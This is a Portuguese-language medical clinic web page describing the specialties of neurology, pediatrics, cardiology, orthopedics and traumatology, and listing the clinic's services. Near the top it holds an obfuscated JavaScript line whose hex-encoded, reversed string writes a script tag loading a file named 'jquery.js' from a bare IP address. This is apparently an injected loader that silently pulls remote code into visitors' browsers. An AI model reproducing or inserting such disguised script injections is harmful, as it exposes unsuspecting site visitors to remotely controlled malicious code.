Serviços

Caracterizado pelo departamento

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

A neurologia surgiu durante a segunda metade do século XIX, em Paris, França, com os professores do hospital universitário de Salpêtrière, os Doutores: Charcot, Pierre Marie e Joseph Babinski.

A neurologia no Brasil teve contribuição fundamental dos mestres e pesquisadores desta escola francesa, e do considerado “pai da Neurologia no Brasil” o Doutor Antonio Austregesilo Rodrigues de Lima que em sua época dedicou seus estudos a histeria.

A disciplina de Doenças Nervosas e Mentais foi criada em 1882 de acordo com o decreto nº 3.141, e foi fundamental para dar início aos assuntos de neurologia e psiquiatria, cujas quais na época eram praticadas de forma simultânea.

Em meados de 1902 foi criado a primeira escola de neurologia no Brasil, e essas foram modernizadas nos governos de Getúlio Vargas e Juscelino Kubitschek. A época moderna da Neurologia aqui no Brasil teve como característica a renovação das bases curriculares do ensino superior e a criação de departamentos de diversas áreas da medicina. Outro marco da neurologia moderna foi a fundação da Associação Brasileira de Neurologia (ABN) no Rio de Janeiro em maio de 1962. Entre os marcos pós modernos temos a criação de grupos de trabalhos e de departamentos científicos especializados em diferentes áreas da neurologia.

A evolução da área médica brasileira resultou em inúmeros benefícios para nosso país em mérito de conhecimentos científicos. Atualmente a neurologia é o resultado de uma trajetória longa, onde houve a contribuição de cientistas de diversos países, sendo esses pesquisadores médicos ou de outras áreas. É importante ressaltar que os diversos pesquisadores brasileiros ao longo de toda a história da neurologia contribuíram para a concretização da área e consolidação dos conhecimentos em nosso território beneficiando esta e as próximas gerações.

Estudos e definições

A área da neurologia é um ramo especializado da medicina, dentro da grande área de neurociências, na qual se relaciona ao estudo do sistema nervoso e ao tratamentos das doenças que acometem esse sistema. Este ramo médico é responsável por diagnosticar e tratar condições dos sistemas nervoso central, periférico, autonômico e somático, incluindo seus revestimentos, vasos sanguíneos e todo o tecido efetor como no caso da musculatura.

Há inúmeras especialidades dentro da neurologia que são de formação básica ao médico neurologista e outros profissionais que se interessam pelo assunto. Sendo assim estes profissionais podem seguir caminhos mais específicos em sua formação acadêmica. As principais subáreas da neurologia são:

Medicina de traumas cerebrais: esta subárea está direcionada a prevenção, avaliação, tratamento e reabilitação de indivíduos que adquiriram traumas cerebrais. Os neurologistas voltados para essa especialidade são importante intermediadores do processo de recuperação médica e melhora dos resultados funcionais de seus pacientes

Neurofisiologia clínica: o neurologista, psiquiatra ou fisiatra que foca nesta área, procura avaliar e tratar desordens dos sistemas nervoso central, periférico, e autonômico utilizando combinações de avaliações clínicas e eletrofisiológicas como nos casos da eletroencefalografia (EEG), eletromiografia (EMG) entre outros.

Medicina do Sono: Esta área é voltada para profissionais com graduação na área da saúde que se interessam no estudo do sono. Neste os profissionais acompanham em aulas práticas os ambulatórios específicos. Essa área visa a identificação dos principais distúrbios do sono, permitindo que os conhecimentos adquiridos sejam praticados no cotidiano do profissional.

Atualmente são conhecidos por volta de oitenta distúrbios relacionados ao sono. Esses distúrbios podem ser subdivididos entre: os que provocam insônia, os que aumentam o estado de sono como a narcolepsia, os distúrbios que ocorrem durante o sono porém não alteram sua duração como no caso do bruxismo, sonambulismo e o ronco.

Neurologia vascular: área voltada no foco da avaliação e tratamento de eventos vasculares que afetam o cérebro ou a medula espinhal, são exemplos a hemorragia intracraniana ou da medula, isquemia da medula e o acidente vascular cerebral (AVC).

Medicina neuromuscular: O profissional que se habilita neste ramo da neurologia foca na avaliação e tratamentos das desordens de nervos, músculos ou junções neuromusculares. Como exemplos de doenças que afetam essas estruturas temos a Esclerose Lateral Amiotrófica (ELA), neuropatias periféricas como a por exemplo a diabética, distrofias musculares, miopatias, e desordens de transmissão neuromuscular como no caso da Miastenia gravis (doença crônica caracterizada por fraqueza muscular e fadiga rápida quando o músculo é exigido).

A Pediatria constitui-se em uma especialidade da Medicina que estuda, trata e acompanha o ser humano desde o nascimento até a adolescência, ou ainda antes dele, na fase perinatal, quando há necessidade da intervenção pediátrica.

O pediatra visa em sua profissão fins preventivos, que incluem prevenção de acidentes, imunizações (vacinas), aleitamento materno, ou apenas buscando o acompanhamento da criança e do adolescente através de orientações necessárias ao seu crescimento e desenvolvimento saudáveis (puericultura) ou ainda fins curativos, que são procedimentos e tratamentos das diversas patologias que acometem as crianças e adolescentes, utilizando-se do melhor de sua capacidade profissional, habilidades técnicas, conhecimento científico e compromisso ético, objetivando a manutenção ou recuperação da saúde da criança ou do adolescente.

Formação e atuação

A formação do médico pediatra é dirigida exclusivamente aos cuidados da criança e do adolescente onde ele deverá ter no mínimo dois anos de residência médica ou curso de especialização equivalente à pós-graduação. No caso do pediatra interessar-se por áreas específicas da pediatria, além de sua formação inicial, é necessário que o mesmo faça um treinamento e estudos em serviços especializados que vai aproximadamente. de um a três anos, mas, nunca esquecendo-se da “pediatria global” para que possa analisar a criança como um todo, interessando-se pelas condições ambientais, materiais ou espirituais onde ela vive.

Antigamente o médico pediatra limitava-se a acompanhar a criança desde o seu nascimento até a sua adolescência, porém com a evolução da Medicina e seus recursos, ao longo dos anos foram descobrindo-se patologias na gestação , os chamados fenômenos mórbido-fetais, onde o pediatra tem a sua ação, a qual denomina-se Pediatria Perinatal.

A especialidade de Pediatria ainda relaciona-se com Aconselhamento Genético, quando há um risco de incompatibilidade genética entre o casal e que são tratados em conjunto com o Geneticista. Também atua em assistência Pré-natal, a qual normalmente é realizada pelo obstetra, porém a estreita relação entre a mãe e o produto conceitual faz com que haja uma maior aproximação das duas especialidades.

O médico pediatra, na verdade, correlaciona-se com diversas outras especialidades (Ortopedia, Fisioterapia, Fonoaudiologia, etc), ocasionando uma necessidade de um conhecimento geral das mesmas, para poder indicar a melhor opção à cada caso. Ele poderá atuar ainda em Medicina Intensiva Pediátrica, Neonatalogia, e Emergência, estando sempre em contínua atualização, e aprimoramento de conhecimentos científicos, respeitando sempre a vida humana e nunca exercendo a sua profissão como comércio.

Um alicerce que faz a diferença

A Pediatria não é apenas uma atividade médica, mas um estado de espírito, que tem como alicerce o amor à criança, exteriorizando-se em ação, averiguando e investigando os fatores que a levam a determinadas doenças ou ações, ou ainda quais as causas de sofrimento da criança ou adolescente, consequentemente assistindo-os e não apenas tratando uma doença, assim contribuindo para a formação de um ser mentalmente sadio e socialmente útil.

A cardiologia é uma especialidade médica responsável por diagnosticar e tratar moléstias que afetam o coração, assim como as outras estruturas pertencentes ao sistema circulatório.

Até o início do século XX, as doenças circulatórias e cardíacas apresentavam taxa bem mais reduzida do que hoje em dia, em consequência da alimentação mais saudável e do menor sedentarismo da população da época. Originalmente, a cardiologia era estudada somente como uma matéria, um anexo da Clínica Médica.

Com o início da década de 1920, devido ao veloz desenvolvimento industrial e migração da população da zona rural para a zona urbana, os hábitos gerais da população sofreu uma grande mudança, havendo uma popularização das doenças cardíacas na sociedade. No mesmo período, devido à criação do eletrocardiógrafo (máquina utilizada para realizar exames cardíacos), a Cardiologia foi grandemente impulsionada, desvencilhando-se da Clínica Médica, passando a constituir uma especialidade médica.

No Brasil, o estudo oficial da cardiologia como ciência e especialidade médica teve início com Carlos Chagas e seus colaboradores, no ano de 1909. Foram estes pesquisadores que desenvolveram as primeiras pesquisas no país a respeito das doenças do coração, além de introduzirem no Brasil o primeiro eletrocardiograma, que foi instalado no Laboratório de Manguinhos, no Rio de Janeiro.

Na década de 1950 iniciou-se a evolução eletrônica, sendo, então, fabricados equipamentos médicos cada vez mais avançados, impulsionando mais ainda a cardiologia, permitindo a obtenção de diagnósticos mais precisos.

Atualmente, apensar de as doenças cardíacas ainda representarem uma das maiores causas de morte no mundo, a cardiologia é uma das especialidades médicas que apresentam maior evolução, uma vez que possui mais de 100 anos de pesquisas

A Ortopedia é a especialidade médica que utiliza métodos clínicos, físicos e cirúrgicos para tratar, corrigir enfermidades, lesões e deformidades ósseas, dos músculos, dos tendões, articulações e ligamentos, e tudo o que relaciona-se ao aparelho locomotor, ao sistema esquelético e estruturas associadas.

Relação com outras áreas

A Ortopedia está diretamente relacionada à Traumatologia que é a especialidade médica que lida com as lesões corporais resultantes de traumatismos do aparelho músculo-esquelético, focando-se porém em lesões ósseas e tendinosas da coluna, bacia, e membros superiores e inferiores, sendo que outros tipos de traumas deverão ser atendidos pela especialidade à qual relacionam-se.

Outra área relacionada à Ortopedia que também nos chama a atenção é a área desportiva, pois o grande desenvolvimento de atividades físicas ocorrido no Brasil, vem acompanhado algumas vezes de lesões dos aparelhos locomotor e esquelético às pessoas praticantes de esportes e exercícios físicos. Os atletas em geral, hoje, já buscam o profissional da Medicina Esportiva para tratarem de restauração de funções de segmentos comprometidos, fazendo com que o médico ortopedista procure um maior conhecimento nesta área.

Atuação do ortopedista

O médico ortopedista atua em diversas áreas, e dependendo da sua formação ele poderá tratar de pacientes politraumatizados, realizar cirurgias, tratar de fraturas ósseas simples ou mais complicadas, orientar e tratar pacientes com problemas de postura, má formação óssea, coluna, enfim, especializando-se na área que melhor lhe convier.

A especialização hoje, inclusive é vista como um requisito importante no mercado de trabalho, e segundo dados da Sociedade Brasileira de Ortopedia e Traumatologia (SBOT), há aproximadamente dez mil ortopedistas atuando em todo o território nacional, e entre eles oito mil com o título concedido pela Sociedade.

A Traumatologia é a especialidade médica que investiga, diagnostica, trata e acompanha enfermidades relacionadas com fraturas e lesões ósseas e tendinosas provocadas por eventos traumáticos no aparelho músculo-esquelético ou locomotor, composto por: braços, mãos, pés, pernas, coluna , bacia, músculos, tendões e ligamentos.

Atualmente, no Brasil, a Traumatologia e a Ortopedia são especialidades unificadas.

Os acidentes mais comuns atendidos e tratados pelo traumatologista são: traumas desportivos, acidentes domésticos, de trânsito, e de trabalho. O trauma também poderá ser causado pelo aumento na velocidade de locomoção de ser humano, antes considerado como acidente, hoje, considerado como uma doença.

No caso de ocorrências de lesões e estados patológicos imediatos ou tardios, causados por violência sobre o corpo humano, atingindo sua integridade física e mental, vem à tona outra ramificação da Traumatologia denominada de Médico Legal, a qual faz parte da Medicina Legal, constituindo em torno de 60% das perícias, geralmente em causas penais e trabalhistas.

O médico traumatologista
Formação

Deverá ter como base a faculdade de Medicina, com duração de seis anos, que consiste em ciclo básico ( disciplinas como farmacologia, anatomia e fisiologia), ciclo profissional ( escolha da especialidade: traumatologia, ginecologia, urologia, etc.) e internato ou estágio ( no mínimo um ano em hospital, período integral).

Após este período há a fase de residência hospitalar, na área de Traumatologia, que dura aproximadamente dois anos, onde o recém-formado será assistido por uma equipe de especialistas e professores da área.

O médico traumatologista também poderá complementar a sua formação com pós- graduação, mestrado e doutorado, onde o curso escolhido geralmente é a Ortopedia, de uma vez que as duas especialidades são co-ligadas.

Área de atuação

Este profissional da Medicina é especializado no tratamento e reabilitação do aparelho músculo-esquelético quando atingido por por traumas e acidentes , nos mais diversos graus de comprometimento, responsabilizando-se pela restauração e acompanhamento do paciente. Suas atividades poderão ser desenvolvidas em hospitais e clínicas particulares ou públicas, academias, e centros desportivos, onde o atendimento ao atleta torna-se muitas vezes urgente e primordial, fazendo com que a área esportiva torne-se muito promissora para o traumatologista, de uma vez que em geral as instituições visam uma rápida recuperação do atleta e um profissional especializado de plantão.

O traumatologista também relaciona-se mais freqüentemente com profissionais de fisioterapia, radiologia, e reabilitação.

Cabe lembrar também que, como em qualquer área profissional, o aprendizado e a atualização deverão ser constantes, além disso, algumas qualidades como: bom-senso, ética profissional, sensibilidade, entre outras, farão deste profissional um diferencial no mercado de trabalho.

Serviços indicados

Estes são os nossos exames especiais

Check-up gratuito

A base do bem-estar

Teste de DNA

Resultados precisos

Cardio exame

Com equipamentos de alta qualidade

Exames Laboratoriais

Avaliação completa

Temos os melhores especialistas em saúde do Brasil